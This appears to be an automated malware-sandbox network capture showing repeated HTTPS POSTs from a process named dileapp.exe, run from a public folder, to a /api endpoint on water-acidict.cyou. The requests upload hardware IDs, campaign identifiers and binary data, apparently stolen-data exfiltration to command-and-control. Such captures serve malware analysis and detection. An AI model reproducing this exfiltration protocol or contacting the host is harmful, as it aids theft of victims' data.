                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 73 65 6b 31 39 42 2b 79 6d 56 6d 59 66 31 65 45 6d 78 39 30 44 6a 59 4e 6c 59 6a 31 49 42 59 6d 31 38 41 49 66 52 72 4d 51 55 32 42 56 57 47 49 4e 30 59 35 69 4d 43 62 37 6a 68 4c 44 32 77 4f 50 2f 43 68 2b 61 77 56 47 74 4b 44 4a 4c 44 45 57 6d 41 64 64 4c 6a 6c 41 49 52 69 76 70 68 56 35 63 71 57 4d 4a 6f 43 56 51 49 69 78 65 6e 51 74 58 68 43 61 39 66 41 43 48 30 61 7a 45 46 4e 67 53 46 4a 72 46 2f 71 7a 52 53 59 66 31 65 45 6d 78 39 30 44 6a 5a 64 53 4a 42 70 4c 42 5a 6d 38 79 58 78 38 46 4b 78 41 43 47 4a 55 54 57 67 52 37 50 4a 77 47 32 50 61 32 6a 66 41 77 77 65 50 2f 43 68 71 61 77 56 47 6c 4b 44 4a 4c 44 45 59 73 78 70 58 59 6d 59 52 64 6b 48 35 38 41 31 79 62 36 76 65 64 4a 69 4e 52 38 47 2f 61 57 55 6c 58 68 53 4c 74 4d 30 71 4d 52 4f 4b 50 6e
                                                                                                                                      Data Ascii: sek19B+ymVmYf1eEmx90DjYNlYj1IBYm18AIfRrMQU2BVWGIN0Y5iMCb7jhLD2wOP/Ch+awVGtKDJLDEWmAddLjlAIRivphV5cqWMJoCVQIixenQtXhCa9fACH0azEFNgSFJrF/qzRSYf1eEmx90DjZdSJBpLBZm8yXx8FKxACGJUTWgR7PJwG2Pa2jfAwweP/ChqawVGlKDJLDEYsxpXYmYRdkH58A1yb6vedJiNR8G/aWUlXhSLtM0qMROKPn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49765 | 172.67.156.217 | 443 | 7568 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:28 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=C4R8YZVX4TQWJ0I63Y
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20437
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:28 UTC15331OUTData Raw: 2d 2d 43 34 52 38 59 5a 56 58 34 54 51 57 4a 30 49 36 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 43 34 52 38 59 5a 56 58 34 54 51 57 4a 30 49 36 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 34 52 38 59 5a 56 58 34 54 51 57 4a 30 49 36 33 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c
                                                                                                                                      Data Ascii: --C4R8YZVX4TQWJ0I63YContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--C4R8YZVX4TQWJ0I63YContent-Disposition: form-data; name="pid"3--C4R8YZVX4TQWJ0I63YContent-Disposition: form-data; name="lid"c2CoW0--bandl
                                                                                                                                      2024-11-29 22:10:28 UTC5106OUTData Raw: 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00
                                                                                                                                      Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-11-29 22:10:29 UTC | 1022 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:29 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=e577abnfdiqlss4d58ibkfi6a1; expires=Tue, 25-Mar-2025 15:57:07 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBEae0Fv9%2FgEEJA9V2JPs3B0t%2FQxlqIx1d%2Bmt%2BeMBmwjFnJAgrNJnurFFQssNiO1Nx0urCgyec4BheYFcbKFZWzJN4m6ejZtWN7noXM189GsapN0nAuvSapxQ7HbKSdrUe6bPGM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed8f193542ef-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1661&rtt_var=644&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21401&delivery_rate=1673352&cwnd=218&unsent_bytes=0&cid=487d90ad36f6db2b&ts=1256&x=0"
                                                                                                                                      2024-11-29 22:10:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49767 | 172.67.156.217 | 443 | 7568 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:30 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=QZF5UCHRAF44KR9
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 1249
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:30 UTC1249OUTData Raw: 2d 2d 51 5a 46 35 55 43 48 52 41 46 34 34 4b 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 51 5a 46 35 55 43 48 52 41 46 34 34 4b 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 5a 46 35 55 43 48 52 41 46 34 34 4b 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 51 5a 46 35 55
                                                                                                                                      Data Ascii: --QZF5UCHRAF44KR9Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--QZF5UCHRAF44KR9Content-Disposition: form-data; name="pid"1--QZF5UCHRAF44KR9Content-Disposition: form-data; name="lid"c2CoW0--bandl--QZF5U
2024-11-29 22:10:32 UTC | 1019 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:31 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=fmcmcvpgo4a3ofc2ho6js6kdl2; expires=Tue, 25-Mar-2025 15:57:10 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1lGNTo3%2BerZqRxdZYcXYwTf71EFGyq0OruSNpuH7VjYPnJuaf%2Bpp2bTe9zKANTbw20%2F0TizRwVvkz8%2FFMfSkjEI34HGuAovYpltesCX2XQmGP65gUgADL33K7jUHVoYzGiGmcz0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5eda0ad8b3338-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2030&rtt_var=771&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2165&delivery_rate=1410628&cwnd=245&unsent_bytes=0&cid=8b77127abebc9ae9&ts=1125&x=0"
                                                                                                                                      2024-11-29 22:10:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49768 | 172.67.156.217 | 443 | 5448 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:31 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=IMXE4KHJEZ375T7
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18350
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:31 UTC15331OUTData Raw: 2d 2d 49 4d 58 45 34 4b 48 4a 45 5a 33 37 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 49 4d 58 45 34 4b 48 4a 45 5a 33 37 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4d 58 45 34 4b 48 4a 45 5a 33 37 35 54 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 49 4d 58 45 34
                                                                                                                                      Data Ascii: --IMXE4KHJEZ375T7Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--IMXE4KHJEZ375T7Content-Disposition: form-data; name="pid"2--IMXE4KHJEZ375T7Content-Disposition: form-data; name="lid"c2CoW0--bandl--IMXE4
                                                                                                                                      2024-11-29 22:10:31 UTC3019OUTData Raw: 67 39 b2 fd cb d1 0e 65 9d 61 cd b4 aa aa a1 ff 06 ed 3a bc 4a 3a 3b e2 f5 e9 8b 6e 77 18 74 82 a0 b0 d1 ae 4e 72 af 6c 03 bb ef c0 70 76 68 70 6f b8 ab e0 81 89 d2 ce 70 34 95 3f d4 6e 77 97 74 7a df db 4a ab d9 3a a6 45 b3 54 7c 31 23 5d 55 db 3f 35 ab 59 2f 56 9a f4 45 bb 41 ec 02 5f 8c 47 52 99 43 fc b6 3f 53 d6 79 f9 f3 1a 0e ca ab 93 c8 9f 85 77 5e 16 97 be 18 eb 3d 73 d9 32 ab fe 33 c7 83 ce dc 49 e4 3f b3 1b ea ee a4 d7 a3 91 94 7c 88 af f8 cf ec 5e 94 ce 7e 2c e8 c4 3b 69 fc e7 a5 81 e9 5a 24 9a ba e3 0e 7a b3 b9 ed c8 7b 0f b6 d9 b0 b4 ae ef a3 5d ed c6 1f d3 ef f1 ea c5 f6 b4 94 f4 27 ee 0d 47 53 87 0e f1 bf 6d 76 32 b4 bd 6d a4 37 13 bb cf e9 a5 fc 85 8d f5 95 35 7a c0 7d 85 b5 0d 77 54 d1 d3 26 3b d7 a3 37 ae 53 a3 ed b8 29 da 67 13 8b f5 92
                                                                                                                                      Data Ascii: g9ea:J:;nwtNrlpvhpop4?nwtzJ:ET|1#]U?5Y/VEA_GRC?Syw^=s23I?|^~,;iZ$z{]'GSmv2m75z}wT&;7S)g
2024-11-29 22:10:32 UTC | 1023 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:32 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=d7qjhi2lq9bm3rcgdtqo0pa3kg; expires=Tue, 25-Mar-2025 15:57:10 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eO2ZwrBM3WsYR7UFVBN%2BZWODHR1GKpM%2FjM0IEcEmhEIm9jrlt5Iu3mL3YN5p0jvpQ4o4kmImY0909gJW8iyiLvtqD77V7eZezXIXeBPxAhMqYd%2F0AYygtlcH70ebj4%2FbrLyCaBE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5eda1ced272aa-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2405&min_rtt=1847&rtt_var=1091&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19311&delivery_rate=1580942&cwnd=183&unsent_bytes=0&cid=8dfeb21749ad3526&ts=1052&x=0"
                                                                                                                                      2024-11-29 22:10:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49770 | 172.67.156.217 | 443 | 5448 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:33 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=1E5MVDP3Y6
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8736
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:33 UTC8736OUTData Raw: 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 31 45 35 4d 56 44 50 33 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                      Data Ascii: --1E5MVDP3Y6Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--1E5MVDP3Y6Content-Disposition: form-data; name="pid"2--1E5MVDP3Y6Content-Disposition: form-data; name="lid"c2CoW0--bandl--1E5MVDP3Y6Content-
2024-11-29 22:10:34 UTC | 1019 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:34 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ebrdhoo0g1e59cs70ga3451tcr; expires=Tue, 25-Mar-2025 15:57:13 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mg3po3O24nDeE7G3WTuvJ%2B%2FvRFwVWpU07Ynlj56BgXuOolJ7lSdoQvcf9ZSo1Sx7SqcCHi%2FmPUB08Bt4m3B2yTq4waXW91FdjXSJs2jNoD9uKh2w7nazxx8VeT%2FbdFlVJSE2WtY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edb14c1743b2-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1714&rtt_var=857&sent=8&recv=16&lost=0&retrans=1&sent_bytes=4230&recv_bytes=9669&delivery_rate=161486&cwnd=236&unsent_bytes=0&cid=7e370a2e996b740d&ts=1049&x=0"
2024-11-29 22:10:34 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii: fok 8.46.123.228
2024-11-29 22:10:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49771 | 172.67.156.217 | 443 | 7568 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:33 UTC | 286 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=P4W2BVQLSO4P2D6L4ED
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 305448
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:33 UTC15331OUTData Raw: 2d 2d 50 34 57 32 42 56 51 4c 53 4f 34 50 32 44 36 4c 34 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 50 34 57 32 42 56 51 4c 53 4f 34 50 32 44 36 4c 34 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 34 57 32 42 56 51 4c 53 4f 34 50 32 44 36 4c 34 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61
                                                                                                                                      Data Ascii: --P4W2BVQLSO4P2D6L4EDContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--P4W2BVQLSO4P2D6L4EDContent-Disposition: form-data; name="pid"1--P4W2BVQLSO4P2D6L4EDContent-Disposition: form-data; name="lid"c2CoW0--ba
2024-11-29 22:10:35 UTC | 1024 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:35 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=m2cqcndj1ginro9bq5p3b33dul; expires=Tue, 25-Mar-2025 15:57:14 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ql39rLAl%2FR%2Fo7GPJznvy9zn3AVyP90mF77C4rnieOSbesv%2FFOY49XB68e1frG89xsP0Gc6cIN%2FBdYBI0lEjSsOKD2s5tRgHPBj6wINcjwwU7TlpNb1ZSyrflnmuaUpoAyakSqS8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5edb2398fc47a-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=172&recv=330&lost=0&retrans=1&sent_bytes=4226&recv_bytes=307228&delivery_rate=117010&cwnd=242&unsent_bytes=0&cid=f72b91a554c857b5&ts=2090&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49772 | 172.67.156.217 | 443 | 5448 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:36 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=MEMXNBYC8Q
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20389
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:36 UTC15331OUTData Raw: 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 4d 45 4d 58 4e 42 59 43 38 51 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                      Data Ascii: --MEMXNBYC8QContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--MEMXNBYC8QContent-Disposition: form-data; name="pid"3--MEMXNBYC8QContent-Disposition: form-data; name="lid"c2CoW0--bandl--MEMXNBYC8QContent-
                                                                                                                                      2024-11-29 22:10:36 UTC5058OUTData Raw: 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c
                                                                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO@dR<
2024-11-29 22:10:37 UTC | 1028 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:37 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=6apr9gofsjd5qco8pm1htoturk; expires=Tue, 25-Mar-2025 15:57:15 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
